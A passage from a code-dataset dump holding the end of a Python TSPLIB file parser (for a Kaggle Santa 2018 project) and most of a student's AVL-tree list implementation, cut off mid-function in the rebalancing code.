= [float(tmp[1]),float(tmp[2])]\n elif specification['node_coord_type']==NodeCoordinateType.THREED:\n data['node_coords'][int(tmp[0])] = [float(tmp[1]),float(tmp[2]),float(tmp[3])]\n else:\n raise BadTspFile('Cannot parse node coordinate data, unknown node coordinate type')\n\n elif state=='depot_node_data':\n data['depot_node'].append(int(buffer))\n\n elif state=='demand_data':\n g = re.search('([0-9]*) ([0-9]*)',buffer)\n data['demand'][g.group(1)] = g.group(2)\n\n elif state=='edge_data':\n tmp = buffer.split()\n if specification['edge_data_format']==EdgeDataFormat.EDGE_LIST:\n data['edge'][int(tmp[0])] = int(tmp[1])\n elif specification['edge_data_format']==EdgeDataFormat.ADJ_LIST:\n if tmp[-1]=='-1':\n data['edge'][int(tmp[0])] = [int(_x) for _x in 
tmp[1:-1]]\n else:\n raise BadTspFile('Adjacent edge data is improperly terminated (no -1)')\n else:\n raise ParsingError('The parser got confused - unknown edge data format')\n\n elif state=='fixed_edge_data':\n tmp = buffer.split()\n data['fixed_edges'][int(tmp[0])] = int(tmp[1])\n\n elif state=='display_data':\n if specification['display_data_type']==DisplayDataType.TWOD_DISPLAY:\n tmp = buffer.split()\n data['display'][int(tmp[0])] = [float(tmp[1]), float(tmp[2])]\n else:\n raise BadTspFile('Display data is provided when the display data type is not 2D')\n\n elif state=='tour_data':\n\n data['tour'] += [int(_x) for _x in buffer.split()]\n if data['tour'][-1] == -1:\n state = 'specification'\n data['tour'].pop()\n\n\n elif state=='edge_weight_data':\n data['edge_weights'] += [float(_x) for _x in buffer.split()]\n else:\n raise ParsingError('The parser got itself into an unknown state')\n\n if 'dimension' not in specification:\n raise BadTspFile('Require dimension information')\n if 'node_coord_type' not in specification:\n specification['node_coord_type']=NodeCoordinateType.NO_COORDINATES\n\n # Return the parsed data to the caller.\n return specification, data\n\n\n\ndef load(filename: str, **kwargs) -> Union[Solution,Problem]:\n \"\"\"Load and parse a TSPLIB file and call the appropriate generator to turn the dictionaries into objects.\n \n Additional options are passed directly to the parser (e.g., force_gzip).\n\n Parameters\n ----------\n filename : str\n Filename to load.\n\n Returns\n -------\n Union[Solution,Problem]\n Solution or Problem object. None if there was some problem.\n\n Raises\n ------\n BadTspFile\n If the file is badly formatted, or doesn't contain the right information for the type.\n \"\"\"\n result = None\n\n # Parse the TSPLIB file into two dictionaries.\n specification, data = parse_to_dict(filename, **kwargs)\n\n # Do some basic checks: we need a type.\n if 'type' not in specification:\n raise BadTspFile('Loaded file does not declare a type')\n\n # Check for a tour file - if it is then we construct a solution.\n if specification['type']=='TOUR':\n if 'tour' not in data:\n raise BadTspFile('Loaded a TOUR file without any tour data')\n\n result = generate_solution(specification, data)\n\n\n # Check for a symmetrical TSP - if it is we construct a problem.\n elif specification['type']==ProblemType.TSP:\n if ('edge_weight_type' not in specification):\n raise BadTspFile('Loaded a symmetrical TSP file without any edge weight specification')\n\n if (specification['edge_weight_type']==EdgeWeightType.EXPLICIT):\n if ('edge_weight_format' not in specification) or ('edge_weights' not in data):\n raise BadTspFile('Loaded a symmetrical TSP file with explicit edge weights but without a format or any data')\n result = generate_tsp(specification, data)\n else:\n if 'node_coord_type' not in specification:\n raise BadTspFile('Loaded a symmetrical TSP file with functional edge weights without any node coordinate type specification')\n if 'node_coords' not in data:\n raise BadTspFile('Loaded a symmetrical TSP file with functional edge weights without any node coordinate data')\n result = generate_tsp(specification, data)\n\n\n return result\n\n\n\ndef generate_tsp(specification: dict, data: dict) -> Problem:\n \"\"\"Generate a Problem object with a TSP type from parsed dictionaries\n\n Parameters\n ----------\n specification : dict\n Dictionary of specification data.\n data : dict\n Dictionary of data detailing the problem.\n\n Returns\n -------\n Problem\n Object containing the 
problem data.\n\n Raises\n ------\n BadTspFile\n If there was a problem in the data.\n \"\"\"\n\n result = Problem(ProblemType.TSP)\n\n result._edge_weight_type = specification['edge_weight_type']\n result._node_coord_type = specification['node_coord_type']\n result._name = specification['name']\n result._dimension = specification['dimension']\n\n if specification['node_coord_type']==NodeCoordinateType.TWOD:\n result._nodes = np.zeros((result._dimension,2), dtype=np.float32)\n if len(data['node_coords'])!=result._dimension:\n raise BadTspFile('Dimension does not match node coordinate length')\n elif specification['node_coord_type']==NodeCoordinateType.THREED:\n result._nodes = np.zeros((result._dimension,3), dtype=np.float32)\n if len(data['node_coords'])!=result._dimension:\n raise BadTspFile('Dimension does not match node coordinate length')\n else:\n pass\n\n if result._edge_weight_type==EdgeWeightType.ATT:\n result._metric = AttPseudoEuclidean()\n elif result._edge_weight_type==EdgeWeightType.CEILING_2D:\n result._metric = CeilEuclidean()\n elif result._edge_weight_type==EdgeWeightType.EUCLIDEAN_2D:\n result._metric = Euclidean()\n elif result._edge_weight_type==EdgeWeightType.EUCLIDEAN_3D:\n result._metric = Euclidean()\n elif result._edge_weight_type==EdgeWeightType.GEOGRAPHICAL:\n result._metric = Geographical()\n elif result._edge_weight_type==EdgeWeightType.MANHATTAN_2D:\n result._metric = Manhattan()\n elif result._edge_weight_type==EdgeWeightType.MANHATTAN_3D:\n result._metric = Manhattan()\n elif result._edge_weight_type==EdgeWeightType.MAXIMUM_2D:\n result._metric = MaximumLinf()\n elif result._edge_weight_type==EdgeWeightType.MAXIMUM_3D:\n result._metric = MaximumLinf()\n\n if 'node_coords' in data:\n for k,v in data['node_coords'].items():\n result._nodes[k-1] = v\n\n if 'edge_weights' in data:\n result._edge_weights = np.zeros((result._dimension,result._dimension))\n if specification['edge_weight_format']==EdgeWeightFormat.FULL_MATRIX:\n result._edge_weights = np.reshape(data['edge_weights'], (result._dimension,result._dimension))\n\n elif specification['edge_weight_format']==EdgeWeightFormat.UPPER_ROW:\n # No diagonal.\n w = result._dimension - 1\n j = 0\n for i in range(result._dimension-1):\n result._edge_weights[i,i+1:] = data['edge_weights'][j:(j+w)]\n j += w\n w -= 1\n result._edge_weights = result._edge_weights + result._edge_weights.T\n\n elif specification['edge_weight_format']==EdgeWeightFormat.LOWER_ROW:\n raise UnsupportedEdgeWeight()\n\n elif specification['edge_weight_format']==EdgeWeightFormat.UPPER_DIAG_ROW:\n raise UnsupportedEdgeWeight()\n\n elif specification['edge_weight_format']==EdgeWeightFormat.LOWER_DIAG_ROW:\n # With diagonal.\n w = 1\n j = 0\n for i in range(result._dimension):\n result._edge_weights[i,:w] = data['edge_weights'][j:(j+w)]\n j += w\n w += 1\n result._edge_weights = result._edge_weights + result._edge_weights.T\n\n elif specification['edge_weight_format']==EdgeWeightFormat.UPPER_COL:\n raise UnsupportedEdgeWeight()\n\n elif specification['edge_weight_format']==EdgeWeightFormat.LOWER_COL:\n raise UnsupportedEdgeWeight()\n\n elif specification['edge_weight_format']==EdgeWeightFormat.UPPER_DIAG_COL:\n raise UnsupportedEdgeWeight()\n\n elif specification['edge_weight_format']==EdgeWeightFormat.LOWER_DIAG_COL:\n raise UnsupportedEdgeWeight()\n\n return result\n\n\ndef generate_solution(specification: dict, data: dict) -> Solution:\n \"\"\"Generate a solution object containing tour data parsed from dictionaries\n\n Parameters\n ----------\n 
specification : dict\n Dictionary of specification data.\n data : dict\n Dictionary of data detailing the tour.\n\n\n Returns\n -------\n Solution\n Object containing the tour data.\n\n Raises\n ------\n BadTspFile\n If there was a problem in the data.\n \"\"\"\n\n result = Solution()\n\n if 'dimension' in specification:\n if specification['dimension']!=len(data['tour']):\n raise BadTspFile('Length of tour data does not match dimension')\n result.dimension = specification['dimension']+1\n else:\n result.dimension = len(data['tour'])+1\n\n if 'name' in specification:\n result.name = specification['name']\n\n [result.append_comment(_x) for _x in specification['comments']]\n\n result.data = np.array(data['tour'])-1\n\n return result\n","repo_name":"chrisarridge/kaggle-santa-2018","sub_path":"source/santaslittletsplib/libparser.py","file_name":"libparser.py","file_ext":"py","file_size_in_byte":21018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26207043317","text":"#username - eviatars\n#id1 - 322623182\n#name1 - Eviatar Shemesh\n#id2 - 208392290\n#name2 - Yoav Malichi\n\n\n\"\"\"A class representing a node in an AVL tree\"\"\"\n\n\nclass AVLNode(object):\n\t\"\"\"Constructor, you are allowed to add more fields.\n\n\t@type value: str\n\t@param value: data of your node\n\t\"\"\"\n\tdef __init__(self, value):\n\t\tself.value = value\n\t\tself.left = None\n\t\tself.right = None\n\t\tself.parent = None\n\t\tself.size = 0\n\t\tself.height = -1\n\n\n\t\"\"\"returns the left child\n\t@rtype: AVLNode\n\t@returns: the left child of self, None if there is no left child\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef getLeft(self):\n\t\treturn self.left\n\n\n\t\"\"\"returns the right child\n\n\t@rtype: AVLNode\n\t@returns: the right child of self, None if there is no right child\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef getRight(self):\n\t\treturn self.right\n\n\t\"\"\"returns the parent \n\n\t@rtype: AVLNode\n\t@returns: the parent of self, None if there is no parent\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef getParent(self):\n\t\treturn self.parent\n\n\t\"\"\"return the value\n\n\t@rtype: str\n\t@returns: the value of self, None if the node is virtual\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef getValue(self):\n\t\tif self.isRealNode():\n\t\t\treturn self.value\n\t\treturn None\n\n\t\"\"\"returns the height\n\n\t@rtype: int\n\t@returns: the height of self, -1 if the node is virtual\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef getHeight(self):\n\t\tif self.isRealNode():\n\t\t\treturn self.height\n\t\treturn -1\n\n\t\"\"\"returns the size\n\n\t@rtype: int\n\t@returns: the size of self, virtual node size is 0\n\t\"\"\"\n\n\tdef getSize(self):\n\t\treturn self.size\n\n\t\"\"\"returns the balance factor of a given node \n\n\t@rtype: int\n\t@returns: height of left child of self - height of right child of self, 0 if virtual node\n\t\"\"\"\n\n\tdef getBalanceFactor(self):\n\t\tif self.isRealNode():\n\t\t\treturn self.getLeft().height - self.getRight().height\n\t\treturn 0\n\n\t\"\"\"recomputes the size of a Node inplace\n\t\n\t@returns: None\n\t\"\"\"\n\tdef recomputeSize(self):\n\t\tif self.isRealNode():\n\t\t\tself.size = self.left.size + 1 + self.right.size\n\n\t\"\"\"recomputes the height of a Node inplace\n\n\t@returns: None\n\t\"\"\"\n\n\tdef recomputeHeight(self):\n\t\tif self.isRealNode():\n\t\t\tself.height = max(self.left.height, self.right.height) + 1\n\n\t\"\"\"sets left child\n\n\t@type node: AVLNode\n\t@param node: a node\n\t@Time 
complexity: O(1)\n\t\"\"\"\n\tdef setLeft(self, node):\n\t\tself.left = node\n\n\t\"\"\"sets right child\n\n\t@type node: AVLNode\n\t@param node: a node\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef setRight(self, node):\n\t\tself.right = node\n\n\t\"\"\"sets parent\n\n\t@type node: AVLNode\n\t@param node: a node\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef setParent(self, node):\n\t\tself.parent = node\n\n\t\"\"\"sets value\n\n\t@type value: str\n\t@param value: data\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef setValue(self, value):\n\t\tself.value = value\n\n\t\"\"\"sets the height of the node\n\n\t@type h: int\n\t@param h: the height\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef setHeight(self, h):\n\t\tself.height = h\n\n\t\"\"\"sets the size of the node\n\n\t@type s: int\n\t@param s: the size \n\t\"\"\"\n\n\tdef setSize(self, s):\n\t\tself.size = s\n\t\"\"\"returns whether self is not a virtual node \n\n\t@rtype: bool\n\t@returns: False if self is a virtual node, True otherwise.\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef isRealNode(self):\n\t\treturn self.height != -1\n\n\t\"\"\" returns true whether self is a leaf\n\t\n\t\t@rtype: bool\n\t\t@returns: False if self is not a leaf (has a right/left son such that they are not virtual nodes), \n\t\tTrue otherwise\n\t\t@Time complexity: O(1)\n\t\t\"\"\"\n\n\tdef isLeaf(self):\n\t\treturn self.getHeight() == 0\n\n\n\n\"\"\"\nA class implementing the ADT list, using an AVL tree.\n\"\"\"\n\nclass AVLTreeList(object):\n\n\t\"\"\"\n\tConstructor\n\n\t\"\"\"\n\tdef __init__(self):\n\t\tself.root = None\n\t\tself.first_node = None\n\t\tself.last_node = None\n\n\n\t\"\"\"returns whether the list is empty\n\n\t@rtype: bool\n\t@returns: True if the list is empty, False otherwise\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef empty(self):\n\t\treturn self.root is None\n\n\t\"\"\"retrieves the value of the i'th item in the list\n\n\t@type i: int\n\t@pre: 0 <= i < self.length()\n\t@param i: index in the list\n\t@rtype: str\n\t@returns: the the value of the i'th item in the list\n\t\n\tTime Complexity:\n\tRecursion that in worst case goes every call goes one son left / one son right until the deepest leaf\n\tMeaning that the maximum calls is the height of tree\n\tIn every recursion call there is O(1) work, and the height of the tree is O(logn)\n\tThat is why, in total, as we saw in the lecture, the time complexity is O(logn) in the worst case\n\t\"\"\"\n\tdef retrieve(self, i):\n\n\t\troot = self.getRoot()\n\n\t\tdef retrieveRec(node, j):\n\t\t\tloc = node.left.size + 1\n\n\t\t\tif loc == j:\n\t\t\t\treturn node.getValue()\n\t\t\telif j < loc:\n\t\t\t\treturn retrieveRec(node.left, j)\n\t\t\telse:\n\t\t\t\treturn retrieveRec(node.right, j - loc)\n\n\t\treturn retrieveRec(root, i + 1)\n\n\t\"\"\"retrieves the AVLNode that is the i'th item in the list\n\n\t@type i: int\n\t@pre: 0 <= i < self.length()\n\t@param i: index in the list\n\t@rtype: AVLNode\n\t@returns: the AVLNode that is the i'th item in the list\n\n\tTime Complexity:\n\tRecursion that in worst case goes every call goes one son left / one son right until the deepest leaf\n\tMeaning that the maximum calls is the height of tree\n\tIn every recursion call there is O(1) work, and the height of the tree is O(logn)\n\tThat is why, in total, as we saw in the lecture, the time complexity is O(logn) in the worst case\n\t\"\"\"\n\n\tdef retrieveNode(self, i):\n\n\t\troot = self.getRoot()\n\n\t\tdef retrieveRec(node, j):\n\t\t\tloc = node.left.size + 1\n\n\t\t\tif loc == j:\n\t\t\t\treturn node\n\t\t\telif j < 
loc:\n\t\t\t\treturn retrieveRec(node.left, j)\n\t\t\telse:\n\t\t\t\treturn retrieveRec(node.right, j - loc)\n\n\t\treturn retrieveRec(root, i + 1)\n\n\t\"\"\"inserts val at position i in the list\n\n\t@type i: int\n\t@pre: 0 <= i <= self.length()\n\t@param i: The intended index in the list to which we insert val\n\t@type val: str\n\t@param val: the value we insert\n\t@rtype: list\n\t@returns: the number of rebalancing operation due to AVL rebalancing\n\t\"\"\"\n\n\tdef insert(self, i, val):\n\t\tinserted = AVLNode(val)\n\t\tinserted.setHeight(0)\n\t\tinserted.setSize(1)\n\t\tvirtualL = AVLNode(\"\")\n\t\tvirtualR = AVLNode(\"\")\n\t\tinserted.setLeft(virtualL)\n\t\tinserted.setRight(virtualR)\n\t\tvirtualL.setParent(inserted)\n\t\tvirtualR.setParent(inserted)\n\n\t\t#insterted node will be root\n\t\tif(self.empty()):\n\t\t\tself.root = inserted\n\t\t\tself.set_First(inserted)\n\t\t\tself.set_Last(inserted)\n\t\t\tinserted.recomputeHeight()\n\t\t\tinserted.recomputeSize()\n\t\t\treturn 0\n\n\t\t#insert at the begin of list\n\t\tif i == 0:\n\t\t\tnode = self.get_First()\n\t\t\tnode.setLeft(inserted)\n\t\t\tinserted.setParent(node)\n\t\t\tself.set_First(inserted)\n\t\t\treturn self.reBalance(node)\n\n\n\t\t#insert at end of list\n\t\telif i == self.length():\n\t\t\tnode = self.get_Last()\n\t\t\tnode.setRight(inserted)\n\t\t\tinserted.setParent(node)\n\t\t\tself.set_Last(inserted)\n\t\t\treturn self.reBalance(node)\n\n\t\t#get current i'th node\n\t\tnode = self.retrieveNode(i)\n\n\t\t#has left son, need to insert right of the predecessor, has no right son\n\t\tif node.getLeft().isRealNode():\n\t\t\tnode = self.predecessor(node)\n\t\t\tnode.setRight(inserted)\n\t\t\tinserted.setParent(node)\n\t\t\treturn self.reBalance(node)\n\n\t\t#insert as left son of i'th node\n\t\telse:\n\t\t\tnode.setLeft(inserted)\n\t\t\tinserted.setParent(node)\n\t\t\treturn self.reBalance(node)\n\n\t\"\"\"deletes the i'th item in the list\n\n\t@type i: int\n\t@pre: 0 <= i < self.length()\n\t@param i: The intended index in the list to be deleted\n\t@rtype: int\n\t@returns: the number of rebalancing operation due to AVL rebalancing\n\t\n\t@Time Complexity worst case:\n\tsuccessor - called once - O(logn) [see successor]\n\tswapNodes - O(1)\n\tdeleteLeaf - called once - O(logn) [see deleteLeaf]\n\tdeleteOneChildedNode - called once - O(logn [see deleteOneChildedNode]\n\tOthers - O(1)\n\tTotal: O(logn)\n\t\"\"\"\n\tdef delete(self, i):\n\t\tnodeToDelete = self.retrieveNode(i)\n\t\tif nodeToDelete.isLeaf(): # case 1 - lecture 2 slide 51\n\t\t\treturn self.deleteLeaf(nodeToDelete, '1')\n\t\telif nodeToDelete.getLeft().isRealNode() and not nodeToDelete.getRight().isRealNode(): # case 2.1 - lecture 2 slide 51\n\t\t\treturn self.deleteOneChildedNode(nodeToDelete, 'left')\n\t\telif nodeToDelete.getRight().isRealNode() and not nodeToDelete.getLeft().isRealNode(): # case 2.2 - lecture 2 slide 51\n\t\t\treturn self.deleteOneChildedNode(nodeToDelete, 'right')\n\t\telse: # case 3 - lecture 2 slide 51\n\t\t\tnodeToDeleteSuccessor = self.successor(nodeToDelete)\n\t\t\tif not nodeToDeleteSuccessor.isLeaf(): # i.e. 
it has 1 right child only (if 2 then it wasn't the successor)\n\t\t\t\tself.swapNodes(nodeToDelete, nodeToDeleteSuccessor)\n\t\t\t\treturn self.deleteOneChildedNode(nodeToDelete, 'right')\n\t\t\telse:\n\t\t\t\tself.swapNodes(nodeToDelete, nodeToDeleteSuccessor)\n\t\t\t\treturn self.deleteLeaf(nodeToDelete, '3')\n\n\t\"\"\" deletes a node that has one child (bypass)\n\t\n\t@type nodeToDelete: AVLNode\n\t@pre: nodeToDelete is not None and has only one real child\n\t@param nodeToDelete: node to delete\n\t\n\t@type childSide: str\n\t@param childSide: nodeToDelete's child side is real node, and the other child is virtual\n\t\n\t@rtype: int\n\t@return: total balance operations that were required during the delete operation\n\t@Time complexity worst case:\n\tO(1) - getters & setters\n\treBalance - O(logn) [see reBalance]\n\tsuccessor / predecessor - O(logn)\n\ttotal: O(logn)\n\t\"\"\"\n\tdef deleteOneChildedNode(self, nodeToDelete, childSide):\n\t\tif childSide == 'left':\n\t\t\tnodeToDeleteParent = nodeToDelete.getParent()\n\t\t\tnodeToDeleteLeftSon = nodeToDelete.getLeft()\n\t\t\tif nodeToDelete is self.get_Last():\n\t\t\t\tself.set_Last(self.predecessor(nodeToDelete))\n\t\t\tnodeToDeleteLeftSon.setParent(nodeToDeleteParent)\n\t\t\tnodeToDelete.setLeft(AVLNode(None))\n\t\t\tnodeToDelete.getLeft().setParent(nodeToDeleteLeftSon)\n\t\t\tnodeToDelete.setParent(None)\n\t\t\tif self.getRoot() is nodeToDelete: # i.e. nodeToDeleteParent is None\n\t\t\t\tself.root = nodeToDeleteLeftSon\n\t\t\telse:\n\t\t\t\tif nodeToDeleteParent.getLeft() is nodeToDelete:\n\t\t\t\t\tnodeToDeleteParent.setLeft(nodeToDeleteLeftSon)\n\t\t\t\telif nodeToDeleteParent.getRight() is nodeToDelete:\n\t\t\t\t\tnodeToDeleteParent.setRight(nodeToDeleteLeftSon)\n\t\t\tbalanceOps = self.reBalance(nodeToDeleteParent)\n\n\t\telif childSide == 'right':\n\t\t\tnodeToDeleteParent = nodeToDelete.getParent()\n\t\t\tnodeToDeleteRightSon = nodeToDelete.getRight()\n\t\t\tif nodeToDelete is self.get_First(): # irrelevant in case 3\n\t\t\t\tself.set_First(self.successor(nodeToDelete))\n\t\t\tnodeToDeleteRightSon.setParent(nodeToDeleteParent)\n\t\t\tnodeToDelete.setRight(AVLNode(None))\n\t\t\tnodeToDelete.getRight().setParent(nodeToDeleteRightSon)\n\t\t\tnodeToDelete.setParent(None)\n\t\t\tif self.getRoot() is nodeToDelete: # i.e. 
nodeToDeleteParent is None\n\t\t\t\tself.root = nodeToDeleteRightSon\n\t\t\telse:\n\t\t\t\tif nodeToDeleteParent.getLeft() is nodeToDelete:\n\t\t\t\t\tnodeToDeleteParent.setLeft(nodeToDeleteRightSon)\n\t\t\t\telif nodeToDeleteParent.getRight() is nodeToDelete:\n\t\t\t\t\tnodeToDeleteParent.setRight(nodeToDeleteRightSon)\n\t\t\tbalanceOps = self.reBalance(nodeToDeleteParent)\n\n\t\treturn balanceOps\n\n\t\"\"\" deletes a node that is a leaf\n\n\t\t@type nodeToDelete: AVLNode\n\t\t@pre: nodeToDelete is not None and has 2 virtual sons\n\t\t@param nodeToDelete: node to delete\n\n\t\t@type case: str\n\t\t@param case: case 1 / 3 (original node is a leaf / successor is a leaf respectively)\n\n\t\t@rtype: int\n\t\t@return: total balance operations that were required during the delete operation\n\t\t\n\t\t@Time complexity:\n\t\tO(1) - getters & setters\n\t\treBalance - O(logn) [see reBalance]\n\t\tpredecessor - O(logn)\n\t\tsuccessor - O(logn)\n\t\ttotal: O(logn)\n\t\t\"\"\"\n\tdef deleteLeaf(self, nodeToDelete, case):\n\t\tnodeToDeleteParent = nodeToDelete.getParent()\n\t\tif case == '1':\n\t\t\tif nodeToDelete is self.getRoot():\n\t\t\t\tself.root = None\n\t\t\t\tself.set_Last(None)\n\t\t\t\tself.set_First(None)\n\t\t\t\treturn 0\n\n\t\tif nodeToDelete is self.get_First():\n\t\t\tself.set_First(self.successor(nodeToDelete))\n\t\tif nodeToDelete is self.get_Last():\n\t\t\tself.set_Last(self.predecessor(nodeToDelete))\n\n\t\tnodeToDelete.setParent(None)\n\t\tif nodeToDeleteParent.getLeft() is nodeToDelete:\n\t\t\tnodeToDeleteParent.setLeft(AVLNode(None))\n\t\t\tnodeToDeleteParent.getLeft().setParent(nodeToDeleteParent)\n\t\telif nodeToDeleteParent.getRight() is nodeToDelete:\n\t\t\tnodeToDeleteParent.setRight(AVLNode(None))\n\t\t\tnodeToDeleteParent.getRight().setParent(nodeToDeleteParent)\n\t\tbalanceOps = self.reBalance(nodeToDeleteParent)\n\t\treturn balanceOps\n\n\n\t\"\"\" Swapping 2 nodes (changing pointers)\n\t\n\t@pre: boths node1, node2 are AVLNodes\n\t\n\t@type node1: AVLNode\n\t@param node1: an AVLNode\n\t\n\t@type node2: AVLNode\n\t@param node2: an AVLNode\n\t\n\t@rtype: None\n\t\"\"\"\n\n\tdef swapNodes(self, node1, node2):\n\t\tnode1Parent = node1.getParent()\n\t\tnode1Left = node1.getLeft()\n\t\tnode1Right = node1.getRight()\n\n\t\tnode2Parent = node2.getParent()\n\t\tnode2Left = node2.getLeft()\n\t\tnode2Right = node2.getRight()\n\n\t\tdone = False\n\t\t# case node1Parent == node2Parent\n\t\t# do not switch node1, node2 parents, just switch left and right of parent & sons\n\t\tif node1Parent and node2Parent and node1Parent is node2Parent:\n\t\t\tif node1Parent.getLeft() is node1:\n\t\t\t\tnode1Parent.setLeft(node2)\n\t\t\t\tnode1Parent.setRight(node1)\n\t\t\telif node1Parent.getRight() is node1:\n\t\t\t\tnode1Parent.setRight(node2)\n\t\t\t\tnode1Parent.setLeft(node1)\n\t\t\tnode1.setLeft(node2Left)\n\t\t\tnode2Left.setParent(node1)\n\t\t\tnode1.setRight(node2Right)\n\t\t\tnode2Right.setParent(node1)\n\t\t\tnode2.setLeft(node1Left)\n\t\t\tnode1Left.setParent(node2)\n\t\t\tnode2.setRight(node1Right)\n\t\t\tnode1Right.setParent(node2)\n\t\t\tdone = True\n\n\t\t# if we get here then node1Parent is not node2Parent\n\t\telse:\n\t\t\tif node1Parent:\n\t\t\t\tif node1Parent.getLeft() is node1:\n\t\t\t\t\tif node1Parent is not node2:\n\t\t\t\t\t\tnode1Parent.setLeft(node2)\n\t\t\t\t\telse:\n\t\t\t\t\t\tif node2Parent:\n\t\t\t\t\t\t\tif node2Parent.getLeft() is node2:\n\t\t\t\t\t\t\t\tnode2Parent.setLeft(node1)\n\t\t\t\t\t\t\telif node2Parent.getRight() is 
node2:\n\t\t\t\t\t\t\t\tnode2Parent.setRight(node1)\n\t\t\t\t\t\tnode1.setParent(node2Parent)\n\t\t\t\t\t\tnode1.setLeft(node2)\n\t\t\t\t\t\tnode1.setRight(node2Right)\n\t\t\t\t\t\tnode2Right.setParent(node1)\n\n\t\t\t\t\t\tnode2.setLeft(node1Left)\n\t\t\t\t\t\tnode1Left.setParent(node2)\n\t\t\t\t\t\tnode2.setRight(node1Right)\n\t\t\t\t\t\tnode1Right.setParent(node2)\n\t\t\t\t\t\tnode2.setParent(node1)\n\n\t\t\t\t\t\tdone = True\n\n\t\t\t\telif node1Parent.getRight() is node1:\n\t\t\t\t\tif node1Parent is not node2:\n\t\t\t\t\t\tnode1Parent.setRight(node2)\n\t\t\t\t\telse:\n\t\t\t\t\t\tif node2Parent:\n\t\t\t\t\t\t\tif node2Parent.getLeft() is node2:\n\t\t\t\t\t\t\t\tnode2Parent.setLeft(node1)\n\t\t\t\t\t\t\telif node2Parent.getRight() is node2:\n\t\t\t\t\t\t\t\tnode2Parent.setRight(node1)\n\t\t\t\t\t\tnode1.setParent(node2Parent)\n\t\t\t\t\t\tnode1.setRight(node2)\n\t\t\t\t\t\tnode1.setLeft(node2Left)\n\t\t\t\t\t\tnode2Left.setParent(node1)\n\n\t\t\t\t\t\tnode2.setLeft(node1Left)\n\t\t\t\t\t\tnode1Left.setParent(node2)\n\t\t\t\t\t\tnode2.setRight(node1Right)\n\t\t\t\t\t\tnode1Right.setParent(node2)\n\t\t\t\t\t\tnode2.setParent(node1)\n\n\t\t\t\t\t\tdone = True\n\n\t\t\tif node2Parent:\n\t\t\t\tif node2Parent.getLeft() is node2:\n\t\t\t\t\tif node2Parent is not node1:\n\t\t\t\t\t\tnode2Parent.setLeft(node1)\n\t\t\t\t\telse:\n\t\t\t\t\t\tif node1Parent:\n\t\t\t\t\t\t\tif node1Parent.getLeft() is node1:\n\t\t\t\t\t\t\t\tnode1Parent.setLeft(node2)\n\t\t\t\t\t\t\telif node1Parent.getRight() is node1:\n\t\t\t\t\t\t\t\tnode1Parent.setRight(node2)\n\t\t\t\t\t\tnode2.setParent(node1Parent)\n\t\t\t\t\t\tnode2.setLeft(node1)\n\t\t\t\t\t\tnode2.setRight(node1Right)\n\t\t\t\t\t\tnode1Right.setParent(node2)\n\n\t\t\t\t\t\tnode1.setLeft(node2Left)\n\t\t\t\t\t\tnode2Left.setParent(node1)\n\t\t\t\t\t\tnode1.setRight(node2Right)\n\t\t\t\t\t\tnode2Right.setParent(node1)\n\t\t\t\t\t\tnode1.setParent(node2)\n\n\t\t\t\t\t\tdone = True\n\n\t\t\t\telif node2Parent.getRight() is node2:\n\t\t\t\t\tif node2Parent is not node1:\n\t\t\t\t\t\tnode2Parent.setRight(node1)\n\t\t\t\t\telse:\n\t\t\t\t\t\tif node1Parent:\n\t\t\t\t\t\t\tif node1Parent.getLeft() is node1:\n\t\t\t\t\t\t\t\tnode1Parent.setLeft(node2)\n\t\t\t\t\t\t\telif node1Parent.getRight() is node1:\n\t\t\t\t\t\t\t\tnode1Parent.setRight(node2)\n\n\t\t\t\t\t\tnode2.setParent(node1Parent)\n\t\t\t\t\t\tnode2.setRight(node1)\n\t\t\t\t\t\tnode2.setLeft(node1Left)\n\t\t\t\t\t\tnode1Left.setParent(node2)\n\n\t\t\t\t\t\tnode1.setLeft(node2Left)\n\t\t\t\t\t\tnode2Left.setParent(node1)\n\t\t\t\t\t\tnode1.setRight(node2Right)\n\t\t\t\t\t\tnode2Right.setParent(node1)\n\n\t\t\t\t\t\tnode1.setParent(node2)\n\n\t\t\t\t\t\tdone = True\n\n\t\tif not done:\n\t\t\tnode1.setParent(node2Parent)\n\t\t\tnode1.setLeft(node2Left)\n\t\t\tnode1.setRight(node2Right)\n\t\t\tnode2Left.setParent(node1)\n\t\t\tnode2Right.setParent(node1)\n\n\t\t\tnode2.setParent(node1Parent)\n\t\t\tnode2.setLeft(node1Left)\n\t\t\tnode2.setRight(node1Right)\n\t\t\tnode1Left.setParent(node2)\n\t\t\tnode1Right.setParent(node2)\n\n\t\tif self.getRoot() is node1:\n\t\t\tself.root = node2\n\t\telif self.getRoot() is node2:\n\t\t\tself.root = node1\n\n\t\tif self.get_First() is node1:\n\t\t\tself.set_First(node2)\n\t\telif self.get_First() is node2:\n\t\t\tself.set_First(node1)\n\n\t\tif self.get_Last() is node1:\n\t\t\tself.set_Last(node2)\n\t\telif self.get_Last() is 
node2:\n\t\t\tself.set_Last(node1)\n\n\t\tnode1.recomputeSize()\n\t\tnode1.recomputeHeight()\n\t\tnode2.recomputeSize()\n\t\tnode2.recomputeHeight()\n\n\t\"\"\"Re balancing the Tree inplace\n\t\n\t@type nodeToCheckBF: AVLNode\n\t@param nodeToCheckBF: The start node in which we'll start to rebalance the tree up to the root (if needed)\n\t\n\t@rtype: int\n\t@return: number of balancing operations that have been made in order to reBalance the tree\n\t\n\t@Time complexity:\n\tWorst case - maximum route from a node to root is O(h) = O(logn)\n\tIn every node in that route, O(1) work is executed in the worst case (rotation + arithmetic operation)\n\tTotal: O(logn) * O(1) = O(logn) work\n\t\"\"\"\n\tdef reBalance(self, nodeToCheckBF):\n\t\tbalanceOps = 0\n\t\twhile nodeToCheckBF is not None:\n\t\t\tbalanceFactor = nodeToCheckBF.getBalanceFactor()\n\t\t\theight = nodeToCheckBF.getHeight()\n\t\t\tif abs(balanceFactor) == 2:\n\t\t\t\tbalanceOps += self.rotate(nodeToCheckBF, balanceFactor)\n\t\t\t\tnodeToCheckBF = 